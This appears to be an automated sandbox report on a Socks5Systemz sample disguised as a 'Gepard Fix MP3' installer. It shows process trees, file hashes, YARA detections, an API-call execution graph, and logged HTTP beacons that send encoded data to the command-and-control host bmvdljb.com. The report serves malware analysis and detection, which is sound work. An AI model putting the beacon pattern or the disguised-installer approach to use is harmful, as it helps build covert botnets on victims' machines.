                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                          Oct 5, 2024 14:47:11.926157951 CEST220INHTTP/1.1 200 OK
                                                          Server: nginx/1.20.1
                                                          Date: Sat, 05 Oct 2024 12:47:11 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          X-Powered-By: PHP/7.4.33
                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: e67b680813008c20


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          74192.168.2.661657185.208.158.248804888C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 5, 2024 14:47:12.057410955 CEST314OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1
                                                          Host: bmvdljb.com
                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                          Oct 5, 2024 14:47:12.943496943 CEST220INHTTP/1.1 200 OK
                                                          Server: nginx/1.20.1
                                                          Date: Sat, 05 Oct 2024 12:47:12 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          X-Powered-By: PHP/7.4.33
                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: e67b680813008c20


                                                          Click to jump to process

                                                          Click to jump to process

                                                          Click to dive into process behavior distribution

                                                          Click to jump to process

                                                          Target ID:0
                                                          Start time:08:45:06
                                                          Start date:05/10/2024
                                                          Path:C:\Users\user\Desktop\eCh9R4T214.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\eCh9R4T214.exe"
                                                          Imagebase:0x400000
                                                          File size:4'405'400 bytes
                                                          MD5 hash:FAEFAE3EA2DB457031EB3F72AB6FEDF5
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:false

                                                          Target ID:1
                                                          Start time:08:45:06
                                                          Start date:05/10/2024
                                                          Path:C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmp
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmp" /SL5="$103F8,4124077,54272,C:\Users\user\Desktop\eCh9R4T214.exe"
                                                          Imagebase:0x400000
                                                          File size:709'120 bytes
                                                          MD5 hash:16C9D19AB32C18671706CEFEE19B6949
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:false

                                                          Target ID:3
                                                          Start time:08:45:09
                                                          Start date:05/10/2024
                                                          Path:C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exe" -i
                                                          Imagebase:0x400000
                                                          File size:2'910'208 bytes
                                                          MD5 hash:FBBCE7B2EF79BF1D1711CCA350EA2C5A
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000003.00000002.3386708643.0000000002B7E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 29%, ReversingLabs
                                                          • Detection: 35%, Virustotal, Browse
                                                          Reputation:low
                                                          Has exited:false

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:21.2%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:2.4%
                                                            Total number of Nodes:1499
                                                            Total number of Limit Nodes:22
                                                            execution_graph 4980 409c40 5021 4030dc 4980->5021 4982 409c56 5024 4042e8 4982->5024 4984 409c5b 5027 40457c GetModuleHandleA GetProcAddress 4984->5027 4990 409c6a 5044 4090a4 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 4990->5044 5007 409d43 5106 4074a0 5007->5106 5009 409d05 5009->5007 5139 409aa0 5009->5139 5010 409d84 5110 407a28 5010->5110 5011 409d69 5011->5010 5012 409aa0 4 API calls 5011->5012 5012->5010 5014 409da9 5120 408b08 5014->5120 5018 409def 5019 408b08 21 API calls 5018->5019 5020 409e28 5018->5020 5019->5018 5149 403094 5021->5149 5023 4030e1 GetModuleHandleA GetCommandLineA 5023->4982 5026 404323 5024->5026 5150 403154 5024->5150 5026->4984 5028 404598 5027->5028 5029 40459f GetProcAddress 5027->5029 5028->5029 5030 4045b5 GetProcAddress 5029->5030 5031 4045ae 5029->5031 5032 4045c4 SetProcessDEPPolicy 5030->5032 5033 4045c8 5030->5033 5031->5030 5032->5033 5034 4065b8 5033->5034 5163 405c98 5034->5163 5043 406604 6F9C1CD0 5043->4990 5045 4090f7 5044->5045 5290 406fa0 SetErrorMode 5045->5290 5050 403198 4 API calls 5051 40913c 5050->5051 5052 409b30 GetSystemInfo VirtualQuery 5051->5052 5053 409be4 5052->5053 5054 409b5a 5052->5054 5058 409768 5053->5058 5054->5053 5055 409bc5 VirtualQuery 5054->5055 5056 409b84 VirtualProtect 5054->5056 5057 409bb3 VirtualProtect 5054->5057 5055->5053 5055->5054 5056->5054 5057->5055 5300 406bd0 GetCommandLineA 5058->5300 5060 409825 5061 4031b8 4 API calls 5060->5061 5063 40983f 5061->5063 5062 406c2c 6 API calls 5064 409785 5062->5064 5066 406c2c 5063->5066 5064->5060 5064->5062 5065 403454 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5064->5065 5065->5064 5067 406c53 GetModuleFileNameA 5066->5067 5068 406c77 GetCommandLineA 5066->5068 5069 403278 4 API calls 5067->5069 5070 406c7c 5068->5070 5071 406c75 5069->5071 5072 406c81 5070->5072 5073 406af0 4 API calls 5070->5073 5076 406c89 5070->5076 5074 406ca4 5071->5074 5075 403198 4 API calls 5072->5075 5073->5070 5077 403198 4 API calls 5074->5077 5075->5076 5078 40322c 4 API calls 5076->5078 5079 406cb9 5077->5079 5078->5074 5080 4031e8 5079->5080 5081 4031ec 5080->5081 5082 4031fc 5080->5082 5081->5082 5084 403254 4 API calls 5081->5084 5083 403228 5082->5083 5085 4025ac 4 API calls 5082->5085 5086 4074e0 5083->5086 5084->5082 5085->5083 5087 4074ea 5086->5087 5321 407576 5087->5321 5324 407578 5087->5324 5088 407516 5089 40752a 5088->5089 5327 40748c GetLastError 5088->5327 5093 409bec FindResourceA 5089->5093 5094 409c01 5093->5094 5095 409c06 SizeofResource 5093->5095 5096 409aa0 4 API calls 5094->5096 5097 409c13 5095->5097 5098 409c18 LoadResource 5095->5098 5096->5095 5099 409aa0 4 API calls 5097->5099 5100 409c26 5098->5100 5101 409c2b LockResource 5098->5101 5099->5098 5102 409aa0 4 API calls 5100->5102 5103 409c37 5101->5103 5104 409c3c 5101->5104 5102->5101 5105 409aa0 4 API calls 5103->5105 5104->5009 5136 407918 5104->5136 5105->5104 5107 4074b4 5106->5107 5108 4074c4 5107->5108 5109 4073ec 20 API calls 5107->5109 5108->5011 5109->5108 5111 407a35 5110->5111 5112 405880 4 API calls 5111->5112 5113 407a89 5111->5113 5112->5113 5114 407918 InterlockedExchange 5113->5114 5115 407a9b 5114->5115 5116 405880 4 API calls 5115->5116 5117 407ab1 5115->5117 5116->5117 5118 405880 4 API calls 5117->5118 5119 407af4 5117->5119 5118->5119 5119->5014 5129 408b82 5120->5129 5134 408b39 5120->5134 5121 408bcd 5435 407cb8 5121->5435 5122 407cb8 21 API calls 5122->5134 5124 408be4 5127 4031b8 4 API calls 5124->5127 5126 4034f0 4 API calls 5126->5129 5128 408bfe 5127->5128 5146 404c10 5128->5146 5129->5121 5129->5126 5132 403420 4 API calls 5129->5132 5133 4031e8 4 API calls 5129->5133 5135 407cb8 21 API calls 5129->5135 5130 403420 4 API calls 5130->5134 5131 4031e8 4 API calls 5131->5134 5132->5129 5133->5129 5134->5122 5134->5129 5134->5130 5134->5131 5426 4034f0 5134->5426 5135->5129 5461 4078c4 5136->5461 5140 409ac1 5139->5140 5141 409aa9 5139->5141 5142 405880 4 API calls 5140->5142 5143 405880 4 API calls 5141->5143 5144 409ad2 5142->5144 5145 409abb 5143->5145 5144->5007 5145->5007 5147 402594 4 API calls 5146->5147 5148 404c1b 5147->5148 5148->5018 5149->5023 5151 403164 5150->5151 5152 40318c TlsGetValue 5150->5152 5151->5026 5153 403196 5152->5153 5154 40316f 5152->5154 5153->5026 5158 40310c 5154->5158 5156 403174 TlsGetValue 5157 403184 5156->5157 5157->5026 5159 403120 LocalAlloc 5158->5159 5160 403116 5158->5160 5161 40313e TlsSetValue 5159->5161 5162 403132 5159->5162 5160->5159 5161->5162 5162->5156 5235 405930 5163->5235 5166 405270 GetSystemDefaultLCID 5168 4052a6 5166->5168 5167 404ccc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5167->5168 5168->5167 5169 4051fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 5168->5169 5170 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5168->5170 5172 405308 5168->5172 5169->5168 5170->5168 5171 404ccc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5171->5172 5172->5171 5173 4051fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 5172->5173 5174 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5172->5174 5175 40538b 5172->5175 5173->5172 5174->5172 5268 4031b8 5175->5268 5178 4053b4 GetSystemDefaultLCID 5272 4051fc GetLocaleInfoA 5178->5272 5181 4031e8 4 API calls 5182 4053f4 5181->5182 5183 4051fc 5 API calls 5182->5183 5184 405409 5183->5184 5185 4051fc 5 API calls 5184->5185 5186 40542d 5185->5186 5278 405248 GetLocaleInfoA 5186->5278 5189 405248 GetLocaleInfoA 5190 40545d 5189->5190 5191 4051fc 5 API calls 5190->5191 5192 405477 5191->5192 5193 405248 GetLocaleInfoA 5192->5193 5194 405494 5193->5194 5195 4051fc 5 API calls 5194->5195 5196 4054ae 5195->5196 5197 4031e8 4 API calls 5196->5197 5198 4054bb 5197->5198 5199 4051fc 5 API calls 5198->5199 5200 4054d0 5199->5200 5201 4031e8 4 API calls 5200->5201 5202 4054dd 5201->5202 5203 405248 GetLocaleInfoA 5202->5203 5204 4054eb 5203->5204 5205 4051fc 5 API calls 5204->5205 5206 405505 5205->5206 5207 4031e8 4 API calls 5206->5207 5208 405512 5207->5208 5209 4051fc 5 API calls 5208->5209 5210 405527 5209->5210 5211 4031e8 4 API calls 5210->5211 5212 405534 5211->5212 5213 4051fc 5 API calls 5212->5213 5214 405549 5213->5214 5215 405566 5214->5215 5216 405557 5214->5216 5218 40322c 4 API calls 5215->5218 5286 40322c 5216->5286 5219 405564 5218->5219 5220 4051fc 5 API calls 5219->5220 5221 405588 5220->5221 5222 4055a5 5221->5222 5223 405596 5221->5223 5225 403198 4 API calls 5222->5225 5224 40322c 4 API calls 5223->5224 5226 4055a3 5224->5226 5225->5226 5280 4033b4 5226->5280 5228 4055c7 5229 4033b4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5228->5229 5230 4055e1 5229->5230 5231 4031b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5230->5231 5232 4055fb 5231->5232 5233 405ce4 GetVersionExA 5232->5233 5234 405cfb 5233->5234 5234->5043 5236 40593c 5235->5236 5243 404ccc LoadStringA 5236->5243 5239 4031e8 4 API calls 5240 40596d 5239->5240 5246 403198 5240->5246 5250 403278 5243->5250 5247 4031b7 5246->5247 5248 40319e 5246->5248 5247->5166 5248->5247 5264 4025ac 5248->5264 5255 403254 5250->5255 5252 403288 5253 403198 4 API calls 5252->5253 5254 4032a0 5253->5254 5254->5239 5256 403274 5255->5256 5257 403258 5255->5257 5256->5252 5260 402594 5257->5260 5259 403261 5259->5252 5261 402598 5260->5261 5262 4025a2 5260->5262 5261->5262 5263 403154 4 API calls 5261->5263 5262->5259 5262->5262 5263->5262 5265 4025b0 5264->5265 5267 4025ba 5264->5267 5266 403154 4 API calls 5265->5266 5265->5267 5266->5267 5267->5247 5270 4031be 5268->5270 5269 4031e3 5269->5178 5270->5269 5271 4025ac 4 API calls 5270->5271 5271->5270 5273 405223 5272->5273 5274 405235 5272->5274 5275 403278 4 API calls 5273->5275 5276 40322c 4 API calls 5274->5276 5277 405233 5275->5277 5276->5277 5277->5181 5279 405264 5278->5279 5279->5189 5281 4033bc 5280->5281 5282 403254 4 API calls 5281->5282 5283 4033cf 5282->5283 5284 4031e8 4 API calls 5283->5284 5285 4033f7 5284->5285 5288 403230 5286->5288 5287 403252 5287->5219 5288->5287 5289 4025ac 4 API calls 5288->5289 5289->5287 5298 403414 5290->5298 5293 406fee 5294 407284 FormatMessageA 5293->5294 5295 4072aa 5294->5295 5296 403278 4 API calls 5295->5296 5297 4072c7 5296->5297 5297->5050 5299 403418 LoadLibraryA 5298->5299 5299->5293 5307 406af0 5300->5307 5302 406bf3 5303 406c05 5302->5303 5304 406af0 4 API calls 5302->5304 5305 403198 4 API calls 5303->5305 5304->5302 5306 406c1a 5305->5306 5306->5064 5308 406b1c 5307->5308 5309 403278 4 API calls 5308->5309 5310 406b29 5309->5310 5317 403420 5310->5317 5312 406b31 5313 4031e8 4 API calls 5312->5313 5314 406b49 5313->5314 5315 403198 4 API calls 5314->5315 5316 406b6b 5315->5316 5316->5302 5318 403426 5317->5318 5320 403437 5317->5320 5319 403254 4 API calls 5318->5319 5318->5320 5319->5320 5320->5312 5322 407578 5321->5322 5323 4075b7 CreateFileA 5322->5323 5323->5088 5325 403414 5324->5325 5326 4075b7 CreateFileA 5325->5326 5326->5088 5330 4073ec 5327->5330 5331 407284 5 API calls 5330->5331 5333 407414 5331->5333 5332 407434 5342 405880 5332->5342 5333->5332 5339 405184 5333->5339 5336 407443 5337 403198 4 API calls 5336->5337 5338 407460 5337->5338 5338->5089 5346 405198 5339->5346 5343 405887 5342->5343 5344 4031e8 4 API calls 5343->5344 5345 40589f 5344->5345 5345->5336 5347 4051b5 5346->5347 5354 404e48 5347->5354 5350 4051e1 5352 403278 4 API calls 5350->5352 5353 405193 5352->5353 5353->5332 5357 404e63 5354->5357 5355 404e75 5355->5350 5359 404bd4 5355->5359 5357->5355 5362 404f6a 5357->5362 5369 404e3c 5357->5369 5360 405930 5 API calls 5359->5360 5361 404be5 5360->5361 5361->5350 5363 404f7b 5362->5363 5367 404fc9 5362->5367 5365 40504f 5363->5365 5363->5367 5368 404fe7 5365->5368 5376 404e28 5365->5376 5367->5368 5372 404de4 5367->5372 5368->5357 5370 403198 4 API calls 5369->5370 5371 404e46 5370->5371 5371->5357 5373 404df2 5372->5373 5379 404bec 5373->5379 5375 404e20 5375->5367 5392 4039a4 5376->5392 5382 4059a0 5379->5382 5381 404c05 5381->5375 5383 4059ae 5382->5383 5384 404ccc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5383->5384 5385 4059d8 5384->5385 5386 405184 19 API calls 5385->5386 5387 4059e6 5386->5387 5388 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5387->5388 5389 4059f1 5388->5389 5390 4031b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5389->5390 5391 405a0b 5390->5391 5391->5381 5393 4039ab 5392->5393 5398 4038b4 5393->5398 5395 4039cb 5396 403198 4 API calls 5395->5396 5397 4039d2 5396->5397 5397->5368 5399 4038d5 5398->5399 5400 4038c8 5398->5400 5402 403934 5399->5402 5403 4038db 5399->5403 5401 403780 6 API calls 5400->5401 5406 4038d0 5401->5406 5404 403993 5402->5404 5405 40393b 5402->5405 5407 4038e1 5403->5407 5408 4038ee 5403->5408 5409 4037f4 VariantClear VariantChangeTypeEx VariantChangeTypeEx 5404->5409 5410 403941 5405->5410 5411 40394b 5405->5411 5406->5395 5412 403894 6 API calls 5407->5412 5413 403894 6 API calls 5408->5413 5409->5406 5414 403864 9 API calls 5410->5414 5415 4037f4 VariantClear VariantChangeTypeEx VariantChangeTypeEx 5411->5415 5412->5406 5416 4038fc 5413->5416 5414->5406 5417 40395d 5415->5417 5418 4037f4 VariantClear VariantChangeTypeEx VariantChangeTypeEx 5416->5418 5420 403864 9 API calls 5417->5420 5419 403917 5418->5419 5422 40374c VariantClear 5419->5422 5421 403976 5420->5421 5424 40374c VariantClear 5421->5424 5423 40392c 5422->5423 5423->5395 5425 40398b 5424->5425 5425->5395 5427 4034fd 5426->5427 5433 40352d 5426->5433 5429 403526 5427->5429 5431 403509 5427->5431 5428 403198 4 API calls 5434 403517 5428->5434 5430 403254 4 API calls 5429->5430 5430->5433 5441 4025c4 5431->5441 5433->5428 5434->5134 5436 407cd3 5435->5436 5440 407cc8 5435->5440 5445 407c5c 5436->5445 5439 405880 4 API calls 5439->5440 5440->5124 5442 4025ca 5441->5442 5443 4025dc 5442->5443 5444 403154 4 API calls 5442->5444 5443->5434 5443->5443 5444->5443 5446 407c70 5445->5446 5447 407caf 5445->5447 5446->5447 5449 407bac 5446->5449 5447->5439 5447->5440 5450 407bb7 5449->5450 5451 407bc8 5449->5451 5452 405880 4 API calls 5450->5452 5453 4074a0 20 API calls 5451->5453 5452->5451 5454 407bdc 5453->5454 5455 4074a0 20 API calls 5454->5455 5456 407bfd 5455->5456 5457 407918 InterlockedExchange 5456->5457 5458 407c12 5457->5458 5459 407c28 5458->5459 5460 405880 4 API calls 5458->5460 5459->5446 5460->5459 5462 4078d6 5461->5462 5463 4078e7 5461->5463 5464 4078db InterlockedExchange 5462->5464 5463->5009 5464->5463 6237 409e47 6238 409e6c 6237->6238 6239 4098f4 15 API calls 6238->6239 6242 409e71 6239->6242 6240 409ec4 6271 4026c4 GetSystemTime 6240->6271 6242->6240 6245 408dd8 4 API calls 6242->6245 6243 409ec9 6244 409330 32 API calls 6243->6244 6246 409ed1 6244->6246 6247 409ea0 6245->6247 6248 4031e8 4 API calls 6246->6248 6250 409ea8 MessageBoxA 6247->6250 6249 409ede 6248->6249 6251 406928 5 API calls 6249->6251 6250->6240 6253 409eb5 6250->6253 6252 409eeb 6251->6252 6254 4066c0 5 API calls 6252->6254 6255 405854 5 API calls 6253->6255 6256 409efb 6254->6256 6255->6240 6257 406638 5 API calls 6256->6257 6258 409f0c 6257->6258 6259 403340 4 API calls 6258->6259 6260 409f1a 6259->6260 6261 4031e8 4 API calls 6260->6261 6262 409f2a 6261->6262 6263 4074e0 23 API calls 6262->6263 6264 409f69 6263->6264 6265 402594 4 API calls 6264->6265 6266 409f89 6265->6266 6267 407a28 5 API calls 6266->6267 6268 409fcb 6267->6268 6269 407cb8 21 API calls 6268->6269 6270 409ff2 6269->6270 6271->6243 6198 407548 6199 407554 CloseHandle 6198->6199 6200 40755d 6198->6200 6199->6200 6650 402b48 RaiseException 6201 407749 6202 4076dc WriteFile 6201->6202 6210 407724 6201->6210 6203 4076e8 6202->6203 6204 4076ef 6202->6204 6205 40748c 21 API calls 6203->6205 6206 407700 6204->6206 6207 4073ec 20 API calls 6204->6207 6205->6204 6207->6206 6208 4077e0 6209 4078db InterlockedExchange 6208->6209 6212 407890 6208->6212 6211 4078e7 6209->6211 6210->6201 6210->6208 6651 40294a 6652 402952 6651->6652 6653 402967 6652->6653 6654 403554 4 API calls 6652->6654 6654->6652 6655 403f4a 6656 403f53 6655->6656 6657 403f5c 6655->6657 6659 403f07 6656->6659 6662 403f09 6659->6662 6660 403f3c 6660->6657 6664 403e9c 6662->6664 6665 403154 4 API calls 6662->6665 6668 403f3d 6662->6668 6682 403e9c 6662->6682 6663 403ef2 6667 402674 4 API calls 6663->6667 6664->6660 6664->6663 6670 403ea9 6664->6670 6673 403e8e 6664->6673 6665->6662 6672 403ecf 6667->6672 6668->6657 6671 402674 4 API calls 6670->6671 6670->6672 6671->6672 6672->6657 6674 403e4c 6673->6674 6675 403e67 6674->6675 6676 403e62 6674->6676 6677 403e7b 6674->6677 6680 403e78 6675->6680 6681 402674 4 API calls 6675->6681 6678 403cc8 4 API calls 6676->6678 6679 402674 4 API calls 6677->6679 6678->6675 6679->6680 6680->6663 6680->6670 6681->6680 6683 403ed7 6682->6683 6689 403ea9 6682->6689 6684 403ef2 6683->6684 6686 403e8e 4 API calls 6683->6686 6687 402674 4 API calls 6684->6687 6685 403ecf 6685->6662 6688 403ee6 6686->6688 6687->6685 6688->6684 6688->6689 6689->6685 6690 402674 4 API calls 6689->6690 6690->6685 6699 405150 6700 405163 6699->6700 6701 404e48 19 API calls 6700->6701 6702 405177 6701->6702 6272 403a52 6273 403a74 6272->6273 6274 403a5a WriteFile 6272->6274 6274->6273 6275 403a78 GetLastError 6274->6275 6275->6273 6276 402654 6277 403154 4 API calls 6276->6277 6278 402614 6277->6278 6279 402632 6278->6279 6280 403154 4 API calls 6278->6280 6279->6279 6280->6279 5647 409e62 5648 409aa0 4 API calls 5647->5648 5649 409e67 5648->5649 5650 409e6c 5649->5650 5750 402f24 5649->5750 5684 4098f4 5650->5684 5653 409ec4 5689 4026c4 GetSystemTime 5653->5689 5655 409ec9 5690 409330 5655->5690 5656 409e71 5656->5653 5755 408dd8 5656->5755 5660 409ea0 5663 409ea8 MessageBoxA 5660->5663 5661 4031e8 4 API calls 5662 409ede 5661->5662 5708 406928 5662->5708 5663->5653 5666 409eb5 5663->5666 5758 405854 5666->5758 5671 409f0c 5735 403340 5671->5735 5673 409f1a 5674 4031e8 4 API calls 5673->5674 5675 409f2a 5674->5675 5676 4074e0 23 API calls 5675->5676 5677 409f69 5676->5677 5678 402594 4 API calls 5677->5678 5679 409f89 5678->5679 5680 407a28 5 API calls 5679->5680 5681 409fcb 5680->5681 5682 407cb8 21 API calls 5681->5682 5683 409ff2 5682->5683 5762 40953c 5684->5762 5689->5655 5697 409350 5690->5697 5693 409375 CreateDirectoryA 5694 4093ed 5693->5694 5695 40937f GetLastError 5693->5695 5696 40322c 4 API calls 5694->5696 5695->5697 5698 4093f7 5696->5698 5697->5693 5699 408dd8 4 API calls 5697->5699 5704 407284 5 API calls 5697->5704 5707 405880 4 API calls 5697->5707 5854 406cf4 5697->5854 5877 409224 5697->5877 5896 404c84 5697->5896 5899 408da8 5697->5899 5700 4031b8 4 API calls 5698->5700 5699->5697 5702 409411 5700->5702 5703 4031b8 4 API calls 5702->5703 5705 40941e 5703->5705 5704->5697 5705->5661 5707->5697 6009 406820 5708->6009 5711 403454 4 API calls 5712 40694a 5711->5712 5713 4066c0 5712->5713 6014 4068e4 5713->6014 5716 4066f0 5718 403340 4 API calls 5716->5718 5717 4066fe 5719 403454 4 API calls 5717->5719 5720 4066fc 5718->5720 5721 406711 5719->5721 5723 403198 4 API calls 5720->5723 5722 403340 4 API calls 5721->5722 5722->5720 5724 406733 5723->5724 5725 406638 5724->5725 5726 406642 5725->5726 5727 406665 5725->5727 6020 406950 5726->6020 5729 40322c 4 API calls 5727->5729 5731 40666e 5729->5731 5730 406649 5730->5727 5732 406654 5730->5732 5731->5671 5733 403340 4 API calls 5732->5733 5734 406662 5733->5734 5734->5671 5736 403344 5735->5736 5737 4033a5 5735->5737 5738 4031e8 5736->5738 5739 40334c 5736->5739 5740 4031fc 5738->5740 5742 403254 4 API calls 5738->5742 5739->5737 5743 4031e8 4 API calls 5739->5743 5745 40335b 5739->5745 5741 403228 5740->5741 5746 4025ac 4 API calls 5740->5746 5741->5673 5742->5740 5743->5745 5744 403254 4 API calls 5747 403375 5744->5747 5745->5744 5746->5741 5748 4031e8 4 API calls 5747->5748 5749 4033a1 5748->5749 5749->5673 5751 403154 4 API calls 5750->5751 5752 402f29 5751->5752 6026 402bcc 5752->6026 5754 402f51 5754->5754 5756 408da8 4 API calls 5755->5756 5757 408df4 5756->5757 5757->5660 5759 405859 5758->5759 5760 405930 5 API calls 5759->5760 5761 40586b 5760->5761 5761->5761 5769 40955b 5762->5769 5763 409590 5766 40959d GetUserDefaultLangID 5763->5766 5770 409592 5763->5770 5764 409594 5780 407024 GetModuleHandleA GetProcAddress 5764->5780 5766->5770 5768 40956f 5774 409884 5768->5774 5769->5763 5769->5764 5769->5768 5770->5768 5771 4095cb GetACP 5770->5771 5772 4095ef 5770->5772 5771->5768 5771->5770 5772->5768 5773 409615 GetACP 5772->5773 5773->5768 5773->5772 5775 40988c 5774->5775 5779 4098c6 5774->5779 5776 403420 4 API calls 5775->5776 5775->5779 5777 4098c0 5776->5777 5838 408e80 5777->5838 5779->5656 5781 407067 5780->5781 5782 40705e 5780->5782 5783 407070 5781->5783 5784 4070a8 5781->5784 5793 403198 4 API calls 5782->5793 5801 406f68 5783->5801 5786 406f68 RegOpenKeyExA 5784->5786 5788 4070c1 5786->5788 5787 407089 5789 4070de 5787->5789 5804 406f5c 5787->5804 5788->5789 5790 406f5c 6 API calls 5788->5790 5791 40322c 4 API calls 5789->5791 5794 4070d5 RegCloseKey 5790->5794 5795 4070eb 5791->5795 5797 407120 5793->5797 5794->5789 5807 4032fc 5795->5807 5799 403198 4 API calls 5797->5799 5800 407128 5799->5800 5800->5770 5802 406f73 5801->5802 5803 406f79 RegOpenKeyExA 5801->5803 5802->5803 5803->5787 5821 406e10 5804->5821 5808 403300 5807->5808 5809 40333f 5807->5809 5810 4031e8 5808->5810 5811 40330a 5808->5811 5809->5782 5812 4031fc 5810->5812 5818 403254 4 API calls 5810->5818 5813 403334 5811->5813 5814 40331d 5811->5814 5816 403228 5812->5816 5819 4025ac 4 API calls 5812->5819 5817 4034f0 4 API calls 5813->5817 5815 4034f0 4 API calls 5814->5815 5820 403322 5815->5820 5816->5782 5817->5820 5818->5812 5819->5816 5820->5782 5822 406e36 RegQueryValueExA 5821->5822 5823 406e7b 5822->5823 5829 406e59 5822->5829 5825 403198 4 API calls 5823->5825 5824 406e73 5826 403198 4 API calls 5824->5826 5827 406f47 RegCloseKey 5825->5827 5826->5823 5827->5789 5828 403278 4 API calls 5828->5829 5829->5823 5829->5824 5829->5828 5830 403420 4 API calls 5829->5830 5831 406eb0 RegQueryValueExA 5830->5831 5831->5822 5832 406ecc 5831->5832 5832->5823 5833 4034f0 4 API calls 5832->5833 5834 406f0e 5833->5834 5835 406f20 5834->5835 5837 403420 4 API calls 5834->5837 5836 4031e8 4 API calls 5835->5836 5836->5823 5837->5835 5840 408e8e 5838->5840 5841 408ea6 5840->5841 5851 408e18 5840->5851 5842 408e18 4 API calls 5841->5842 5843 408eca 5841->5843 5842->5843 5844 407918 InterlockedExchange 5843->5844 5845 408ee5 5844->5845 5846 408e18 4 API calls 5845->5846 5848 408ef8 5845->5848 5846->5848 5847 408e18 4 API calls 5847->5848 5848->5847 5849 403278 4 API calls 5848->5849 5850 408f27 5848->5850 5849->5848 5850->5779 5852 405880 4 API calls 5851->5852 5853 408e29 5852->5853 5853->5841 5903 406a58 5854->5903 5857 406d26 5859 406a58 5 API calls 5857->5859 5861 406d72 5857->5861 5860 406d36 5859->5860 5862 406d42 5860->5862 5864 406a34 7 API calls 5860->5864 5911 406888 5861->5911 5862->5861 5867 406a58 5 API calls 5862->5867 5873 406d67 5862->5873 5864->5862 5869 406d5b 5867->5869 5868 406638 5 API calls 5870 406d87 5868->5870 5871 406a34 7 API calls 5869->5871 5869->5873 5872 40322c 4 API calls 5870->5872 5871->5873 5874 406d91 5872->5874 5873->5861 5923 406cc8 GetWindowsDirectoryA 5873->5923 5875 4031b8 4 API calls 5874->5875 5876 406dab 5875->5876 5876->5697 5878 409244 5877->5878 5879 406638 5 API calls 5878->5879 5880 40925d 5879->5880 5881 40322c 4 API calls 5880->5881 5888 409268 5881->5888 5883 406978 6 API calls 5883->5888 5884 408dd8 4 API calls 5884->5888 5885 4033b4 4 API calls 5885->5888 5886 405880 4 API calls 5886->5888 5888->5883 5888->5884 5888->5885 5888->5886 5889 4092e4 5888->5889 5963 4091b0 5888->5963 5971 409034 5888->5971 5890 40322c 4 API calls 5889->5890 5891 4092ef 5890->5891 5892 4031b8 4 API calls 5891->5892 5893 409309 5892->5893 5894 403198 4 API calls 5893->5894 5895 409311 5894->5895 5895->5697 5897 405198 19 API calls 5896->5897 5898 404ca2 5897->5898 5898->5697 5900 408dc8 5899->5900 5999 408c80 5900->5999 5904 4034f0 4 API calls 5903->5904 5905 406a6b 5904->5905 5906 406a82 GetEnvironmentVariableA 5905->5906 5910 406a95 5905->5910 5925 406dec 5905->5925 5906->5905 5907 406a8e 5906->5907 5909 403198 4 API calls 5907->5909 5909->5910 5910->5857 5920 406a34 5910->5920 5912 403414 5911->5912 5913 4068ab GetFullPathNameA 5912->5913 5914 4068b7 5913->5914 5915 4068ce 5913->5915 5914->5915 5916 4068bf 5914->5916 5917 40322c 4 API calls 5915->5917 5918 403278 4 API calls 5916->5918 5919 4068cc 5917->5919 5918->5919 5919->5868 5929 4069dc 5920->5929 5924 406ce9 5923->5924 5924->5861 5926 406dfa 5925->5926 5927 4034f0 4 API calls 5926->5927 5928 406e08 5927->5928 